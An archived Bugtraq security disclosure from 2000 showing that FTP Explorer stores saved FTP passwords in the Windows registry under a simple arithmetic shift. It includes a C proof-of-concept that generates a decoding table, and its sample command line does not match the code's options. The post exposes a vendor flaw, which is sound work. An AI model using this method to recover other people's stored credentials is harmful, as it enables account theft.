[14036] in bugtraq
How the password could be recover using FTP Explorer's registry!
daemon@ATHENA.MIT.EDU (Nelson)
Fri Feb 25 20:34:39 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.10002242035500.30645-100000@unreal.sekure.org>
Date: Thu, 24 Feb 2000 21:18:52 -0300
Reply-To: Nelson <stderr@UNREAL.SEKURE.ORG>
From: Nelson <stderr@UNREAL.SEKURE.ORG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
The scene:
user -> nelson
pass -> ABC
ON Connect Window, typed login == nelson and pass == ***(ABC), made a
connection in my own ftp server. After this, I found this KEY in Windows
REGISTRY:
HKEY_CURRENT_USER -> Software -> FTP Explorer -> Profiles -> MY_OWN_SERVER
and I found two values:
Login = nelson
Type = 4A4E52
Hmmm... looks like a encrypted password to me...
Ok, the crypt function in FTP Explorer works like that:
get the ascii hexa value and increment 9, if the position in password was
changed, increment 3 per position.
IN order words, a progression arithmetical.
I made a code to proof this, look the result:
unreal:~/temp$ ./ftpe-crypt -t 3 -i 9 -r 3 -s teste
Criptografia do FTP Explorer v0.6b - por Nelson Brito
unreal:~/temp$ more teste
[...]
A = 4A = 4D = 50
`-> correct
B = 4B = 4E = 51
`-> correct
C = 4C = 4F = 52
`-> correct
[...]
Well, the password is 'ABC'... Is it a big security hole? I think so...
PS: The credits to begin this thread in BOS-Br<bos@sekure.org> goes to
Hever<Hever@vitech.net>.
PPS: Sorry about my poor ENGLISH. If don't understand, don't read. =)
My proof...
-------begin
/*
** Este codigo demostra como funciona a "criptografia" do software FTP
** Explorer, levando-se em consideracao as informacoes passadas para a
** BOS-Br por Hever<Hever@vitech.net>.
**
** author: Nelson Brito
** e-mails: nelson@sekure.org & nelson@secunet.com.br
** program: ftpe-crypt.c
**
** ChangeLog:
** v 0.6b - arquivo de destino incluido(output file)
** - apartir desta versao sera' necessario a utilizacao de todos os
** argumentos na linha de comando
** v 0.5b - incluido opcoes longas na linha de comando
** - problemas da opcao '-h' corrigidos gracas a fpm :*( ) )
** v 0.4 - opcoes de linha de comando acrescentadas, permitindo que o
** usuario "set" suas preferencias [a.k.a. getopt(3)]
** v 0.3 - adicionado argumentos passados para a funcao r2()
** - contador a ser usado em r2() como argumento
** v 0.2 - desenvolvimento das funcao r2() e inclusao de u_abort()) e
** logo()
** - o length do password foi aumentado
** v 0.1 - desenvolvimento inicial do esqueleto do programa, incluindo:
** > retirada dos caracteres especiais, ie, so' [a-z][A-Z][0-9]
** > uma simples PA, sem utilizacao de formula ou funcao
**
** Agradecimentos a drk, Morauder e fpm pela forca com o getopt(3). =)
**
** Como compilar(How to compile):
** lameness:~# gcc -Wall -O3 -g ftpe-crypt.c -o ftpe-crypt
*/
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>
#define VERSION "0.6b"
int r2(int n, int p, int i, int b, FILE *fp){
n=((n+b)+(i*p));
fprintf(fp, "= %X ", n);
return(n);
}
char usage(char *p){
fprintf(stderr, "use: %s -l <length> -i <increment> -r <ratio> -o <output-file>\n", p);
fprintf(stderr, "example: %s -l 15 -i 9 -r 3 -o outlist\n", p);
fprintf(stderr, "options:\n\t -l, --length password's length\n");
fprintf(stderr, "\t -i, --increment ASCII Table's increment\n");
fprintf(stderr, "\t -r, --ratio PA's ratio\n");
fprintf(stderr, "\t -o, --output output file\n");
fprintf(stderr, "\nfor ftpe's criptography use r=3, i=9\n");
exit(0);
}
int main(int ac, char **av){
FILE *outlist = NULL;
register int a = 48;
int r = 0, inc = 0, ct = 0, op;
printf("FTP Explorer's Criptography v%s - by Nelson Brito\n", VERSION);
if(ac != 9) usage(av[0]);
while(1){
static struct option long_options[] = {
{"length", 1, 0, 'l'},
{"ratio", 1, 0, 'r'},
{"increment", 1, 0, 'i'},
{"output", 1, 0, 'o'},
{0, 0, 0, 0}
};
int option_index = 0;
op = getopt_long(ac, av, "l:r:i:o:", long_options, &option_index);
if (op == -1) break;
switch(op){
case 'l':
ct = atoi(optarg);
break;
case 'r':
r = atoi(optarg);
break;
case 'i':
inc = atoi(optarg);
break;
case 'o':
if(!(outlist=fopen(optarg, "w"))){
printf("unable to open %s\n", optarg);
exit(0);
}
break;
default:
usage(av[0]);
break;
}
}
while(a < 123){
if((a >= 58) && (a <= 64)){
printf("%c", (char)0);
a++;
}
else if((a >= 91) && (a <= 96)){
printf("%c", (char)0);
a++;
}
else{
register int c;
fprintf(outlist, "%c ", (char)a);
for(c = 0 ; c < ct ; c++) r2(a, c, r, inc, outlist);
fprintf(outlist, "\n");
a++;
}
}
fclose(outlist);
return(1);
}
-------end
Sem mais,
--
Nelson - nb
